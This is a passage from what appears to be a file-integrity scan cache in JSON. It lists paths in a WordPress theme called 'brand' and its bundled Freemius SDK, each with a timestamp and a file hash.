public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/debug.php\":{\"d\":1522431479,\"h\":\"f45ee28bb4779df1633fff53bf765074\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/contact.php\":{\"d\":1522431479,\"h\":\"54015da898216b4321f315f650157f59\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/plugin-icon.php\":{\"d\":1522431479,\"h\":\"6dc35224a378fa4fd0234bebf3a61e66\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/all-admin-notice.php\":{\"d\":1522431479,\"h\":\"720d8bbbb3b1c3cf8cdbae5e15f8b6d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/account.php\":{\"d\":1522431479,\"h\":\"ddc2ade5d6901d013523160e863105e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/connect.php\":{\"d\":1522431479,\"h\":\"28f5389c9f2cee4cce1cfb2fc13efa26\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/tabs.php\":{\"d\":1522431479,\"h\":\"98b37765b53b1cd473da3e36f726e024\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/powered-by.php\":{\"d\":1522431479,\"h\":\"11be8835fdf9abf142a71d08ea6bdfd7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/checkout-legacy.php\":{\"d\":1522431479,\"h\":\"6f24ddd8161b7818648ccda8986334d2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/admin-notice.php\":{\"d\":1522431479,\"h\":\"d2ec3cf3666f58462b81beae290b0403\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/tabs-capture-js.php\":{\"d\":1522431479,\"h\":\"079a090d941e1aab3c00021d8cb38020\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/checkout.php\":{\"d\":1522431479,\"h\":\"831dc0b976c4eb634413a55ba727b073\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/auto-installation.php\":{\"d\":1522431479,\"h\":\"879f7b6365cd017c9c0abd7d7a12f202\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/firewall-issues-js.php\":{\"d\":1522431479,\"h\":\"60b560aac38e8cdf8dba70bcca150fd6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/add-trial-to-pricing.php\":{\"d\":1522431479,\"h\":\"35d6b7d7a847328cbc9de994c97f7200\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/templates\\/ajax-loader.php\":{\"d\":1522431479,\"h\":\"123195bcbc8b85b8880114d72b6fdf2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/_deactivation-feedback.scss\":{\"d\":1522431479,\"h\":\"b62bb12302013f8fb497d74dc5e33717\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/account.scss\":{\"d\":1522431479,\"h\":\"7e5dc4e0c56dd5072e7f9974c989c996\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/dialog-boxes.scss\":{\"d\":1522431479,\"h\":\"7c842f7a1102b39e85160d2d3ead08a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/checkout.scss\":{\"d\":1522431479,\"h\":\"067842a9f0973b852e6bac3dbe109dd0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/common.scss\":{\"d\":1522431479,\"h\":\"f8363f38a7c364d20a84abd3bdf25fea\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/add-ons.scss\":{\"d\":1522431479,\"h\":\"7a6e9cc976472c55ff4591830c780978\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/affiliation.scss\":{\"d\":1522431479,\"h\":\"9736e869b0be51af9e10cafb24666054\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/_themes.scss\":{\"d\":1522431479,\"h\":\"77f679b58a030694a7cf0644b73535a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/_auto-install.scss\":{\"d\":1522431479,\"h\":\"9fe17bec4c0ea2d4e0fd580c7b54594d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/connect.scss\":{\"d\":1522431479,\"h\":\"df247d62cfacb2d75603574dd3dfe500\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/_ajax-loader.scss\":{\"d\":1522431479,\"h\":\"88592fa5ed858fa9cea53b65c288f840\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/debug.scss\":{\"d\":1522431479,\"h\":\"f8265262b7a65a9327d4cbf13feb3967\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/_license-key-resend.scss\":{\"d\":1522431479,\"h\":\"00740229bb28623fec9621abba9bd728\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/_license-activation.scss\":{\"d\":1522431479,\"h\":\"e6abfe9fca58e82f41e7031b87192733\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/admin\\/_modal-common.scss\":{\"d\":1522431479,\"h\":\"f876818b73f5f67781f7b85dedd0dcbe\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/_load.scss\":{\"d\":1522431479,\"h\":\"bfa55359a633e1a3107e1a1ddda1b787\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/_start.scss\":{\"d\":1522431479,\"h\":\"50f5c75c2be661f9f24a264cb9c954d6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/_functions.scss\":{\"d\":1522431479,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/_colors.scss\":{\"d\":1522431479,\"h\":\"179517aee7bc1f652fefdfa2afffb89e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/_mixins.scss\":{\"d\":1522431479,\"h\":\"ea714f133d14c16f6b8f21f5cd768a5c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/customizer.scss\":{\"d\":1522431479,\"h\":\"ee689a61c2cd5449f96fbda00a7630da\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/scss\\/_vars.scss\":{\"d\":1522431479,\"h\":\"cc1ab25a6462c038f399c2076042f1ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/js\\/nojquery.ba-postmessage.min.js\":{\"d\":1522431479,\"h\":\"6749bac0ae2a426fd5f576c9f2b9e4b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/js\\/nojquery.ba-postmessage.js\":{\"d\":1522431479,\"h\":\"9ae773f2dc724cecaf0f12cf15155bc3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/js\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/js\\/postmessage.js\":{\"d\":1522431479,\"h\":\"fb652a8fc91ca5b926bd6f80150427b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/img\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/connect.css\":{\"d\":1522431479,\"h\":\"889e6dd845a3d2f119ee87ebfeb605e1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/checkout.css\":{\"d\":1522431479,\"h\":\"17061aa254ae8660c38ce30306698d16\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/debug.css\":{\"d\":1522431479,\"h\":\"c427e38f20fc34e494d0b259a3c9886e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/license-activation.css\":{\"d\":1522431479,\"h\":\"050e78c6ffd529f9ac0b1a7a6cdabed2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/affiliation.css\":{\"d\":1522431479,\"h\":\"01285e472e98c3d5ed982fa84ee6f1be\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/deactivation-feedback.css\":{\"d\":1522431479,\"h\":\"b4b394bab55ea6e52a0d9e690b660233\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/add-ons.css\":{\"d\":1522431479,\"h\":\"63be5fee8f33d07724b7881cf49c96fa\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/account.css\":{\"d\":1522431479,\"h\":\"7b6329969b21a86172e30994ee77443c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/dialog-boxes.css\":{\"d\":1522431479,\"h\":\"245f1b48f5fb36eb8f7be8b133df09ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/admin\\/common.css\":{\"d\":1522431479,\"h\":\"cade72063cbba7f473f3903d086ecd3a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/css\\/customizer.css\":{\"d\":1522431479,\"h\":\"f64cf82009bc94f90f712d07c2891c97\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/assets\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/managers\\/class-fs-plan-manager.php\":{\"d\":1522431479,\"h\":\"8e9bd3530fd53b430b06ff532a83f889\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/managers\\/class-fs-option-manager.php\":{\"d\":1522431479,\"h\":\"a80a92ad77bc7e773785de7eff54b0eb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/managers\\/class-fs-plugin-manager.php\":{\"d\":1522431479,\"h\":\"661cdefb77d1eee345ce9dea0a7d1a73\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/managers\\/class-fs-key-value-storage.php\":{\"d\":1522431479,\"h\":\"9419df396572a9c000bdfa80e4d97fc8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/managers\\/class-fs-license-manager.php\":{\"d\":1522431479,\"h\":\"a82f3ccac892e76e9efc785b0a462138\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/managers\\/class-fs-admin-menu-manager.php\":{\"d\":1522431479,\"h\":\"4d3b79b7b3ea4608947a3f41418a808a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/managers\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/managers\\/class-fs-cache-manager.php\":{\"d\":1522431479,\"h\":\"d3ba81a2960ba09c2006f6ee06d3102d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/managers\\/class-fs-admin-notice-manager.php\":{\"d\":1522431479,\"h\":\"80b80162f343d7bbf2944c01c437f3d4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/customizer\\/class-fs-customizer-support-section.php\":{\"d\":1522431479,\"h\":\"43ef1820d7bebfe9b9cc94c0cc24555c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/customizer\\/class-fs-customizer-upsell-control.php\":{\"d\":1522431479,\"h\":\"c72293f0894cbe65cf2828954a9ce6e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/customizer\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/Exceptions\\/Exception.php\":{\"d\":1522431479,\"h\":\"43c3aaa3d07d2539dfc417b9302b39bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/Exceptions\\/ArgumentNotExistException.php\":{\"d\":1522431479,\"h\":\"05a6e4a3bc5fad9a2d0d678df8314ee1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/Exceptions\\/EmptyArgumentException.php\":{\"d\":1522431479,\"h\":\"daa3699e807fcd9383b142cf2225c4d8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/Exceptions\\/InvalidArgumentException.php\":{\"d\":1522431479,\"h\":\"e0e84ff7d7f4cca85109db0239f58d29\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/Exceptions\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/Exceptions\\/OAuthException.php\":{\"d\":1522431479,\"h\":\"34f9c97a33dbce6236138577659944b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/LICENSE.txt\":{\"d\":1522431479,\"h\":\"8264535c0c4e9c6c335635c4026a8022\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/FreemiusBase.php\":{\"d\":1522431479,\"h\":\"4160d44c13bc669d75f5a9f422b81562\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/sdk\\/FreemiusWordPress.php\":{\"d\":1522431479,\"h\":\"8a1fce2b0c3546922a59c21c6f56a1a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/supplements\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/supplements\\/fs-essential-functions-1.1.7.1.php\":{\"d\":1522431479,\"h\":\"a1ebf402549d58f23701f3c1ef2f764a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/debug\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/debug\\/class-fs-debug-bar-panel.php\":{\"d\":1522431479,\"h\":\"9665e6e14396e4b9f11f835f074b6bc4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/debug\\/debug-bar-start.php\":{\"d\":1522431479,\"h\":\"5fa116c8b2bd8686d9c7b230c87e9222\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-scope-entity.php\":{\"d\":1522431479,\"h\":\"0acd7da3ef93baaaf43a4b6598c3d80b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-plugin-license.php\":{\"d\":1522431479,\"h\":\"3b78d9b6ef0e0d3f26abd1a437bb72a0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-pricing.php\":{\"d\":1522431479,\"h\":\"ba6b341492dfee121e2b343ce28a2af9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-site.php\":{\"d\":1522431479,\"h\":\"7fdf759bdd78a3cf87c06e32d46cc2b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-plugin-tag.php\":{\"d\":1522431479,\"h\":\"b906cf339fe7aa4262b890d553c85adc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-entity.php\":{\"d\":1522431479,\"h\":\"8f8e79b4470fe4a933a58f4b2ce6746e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-affiliate-terms.php\":{\"d\":1522431479,\"h\":\"35016787d29f2095d8d4139255ef6d2d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-billing.php\":{\"d\":1522431479,\"h\":\"63c904e144d4bbb827c3e4e4748cc8d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-plugin.php\":{\"d\":1522431479,\"h\":\"f64b86e007a0c4aa181b64bdc73d4b19\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-affiliate.php\":{\"d\":1522431479,\"h\":\"1858bb266130901469b975c74658f556\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-payment.php\":{\"d\":1522431479,\"h\":\"b7f9633b4d36c7f1e57074ce0005d3f6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-plugin-plan.php\":{\"d\":1522431479,\"h\":\"275363d2504f48d2f4f01c3dc8076291\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-plugin-info.php\":{\"d\":1522431479,\"h\":\"411694b5b5c0af56d3a5d9b5dcd1b969\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-subscription.php\":{\"d\":1522431479,\"h\":\"051f2f7a8effe1d0066bbaaf065b7067\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/entities\\/class-fs-user.php\":{\"d\":1522431479,\"h\":\"d6394ad416d1b88488d685c95abfb626\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/fs-plugin-info-dialog.php\":{\"d\":1522431479,\"h\":\"7be390c7c9e39ac0714f8b642ed4b884\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/class-freemius.php\":{\"d\":1522431479,\"h\":\"ce6a119520fff55bb40e89f0d7bac548\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/i18n.php\":{\"d\":1522431479,\"h\":\"5e0b462fd49b7689800652cfcac9b09b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/class-fs-logger.php\":{\"d\":1522431479,\"h\":\"1319afb60186a786ea76977bbcb79e92\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/fs-core-functions.php\":{\"d\":1522431479,\"h\":\"b97d80dc8e267ae465f86a37169a39f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/class-fs-security.php\":{\"d\":1522431479,\"h\":\"229cf58949612ac4a088677ba62c9b97\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/fs-essential-functions.php\":{\"d\":1522431479,\"h\":\"8c13ec651a8b709d64941f443e68d997\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/class-fs-api.php\":{\"d\":1522431479,\"h\":\"79e5307b67f5a57a39a939131b32cdb1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/l10n.php\":{\"d\":1522431479,\"h\":\"6078da2e038117e0ff00a9b375f35b27\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/class-freemius-abstract.php\":{\"d\":1522431479,\"h\":\"01540a3afe2f3286ec5402bcfc383c2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/includes\\/class-fs-plugin-updater.php\":{\"d\":1522431479,\"h\":\"dac58dd736794861c35e2c28c971b3f9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/languages\\/freemius.pot\":{\"d\":1522431479,\"h\":\"de48dd25539201bf36971e841be32180\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/languages\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/require.php\":{\"d\":1522431479,\"h\":\"cb33bedc6f606c29229e82d77af67b98\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/LICENSE.txt\":{\"d\":1522431479,\"h\":\"985eca66feaf0170850231d4616b3074\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/index.php\":{\"d\":1522431479,\"h\":\"3de0a4b8bbe2931c74daebd9674537e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/README.md\":{\"d\":1522431479,\"h\":\"beff5c5fdc7bc41f039a2f565faa082f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/start.php\":{\"d\":1522431479,\"h\":\"94824bc3c4cead9795fae635fd6adcc0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/freemius\\/config.php\":{\"d\":1522431479,\"h\":\"b99678b3aadc6c4a77e62c076eadda6a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/page-templates\\/full-width.php\":{\"d\":1522431479,\"h\":\"8298f46a6d731d3ccb05ae976596f0db\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/inc\\/options\\/brand-options.php\":{\"d\":1522431479,\"h\":\"009a7949aa5dfc4b4951a9026637df84\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/inc\\/advanced\\/add-ons.php\":{\"d\":1522431479,\"h\":\"19411537f5787c45b1c799fdda26aba3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/inc\\/advanced\\/typography.php\":{\"d\":1522431479,\"h\":\"c3fbf9701ee6093904f4c9a6bc995518\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/inc\\/advanced\\/blog.php\":{\"d\":1522431479,\"h\":\"abc1bf48ca08e7df7ec359d596481a39\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/inc\\/advanced\\/colors.php\":{\"d\":1522431479,\"h\":\"1e09b42a51f31239723a6646c5993747\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/inc\\/TGMPA\\/class-tgm-plugin-activation.php\":{\"d\":1522431479,\"h\":\"e74e41c26051d544cae7560ba0b7c8df\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/inc\\/metaboxes\\/brand-hide-elements-metabox.php\":{\"d\":1522431479,\"h\":\"a00d424534204e320b7d0c8ccc5f3677\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/inc\\/metaboxes\\/brand-sidebar-metabox.php\":{\"d\":1522431479,\"h\":\"3351ea198129c72c1908916dc1a8e44b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/themes\\/brand\\/inc\\/metaboxes\\/meta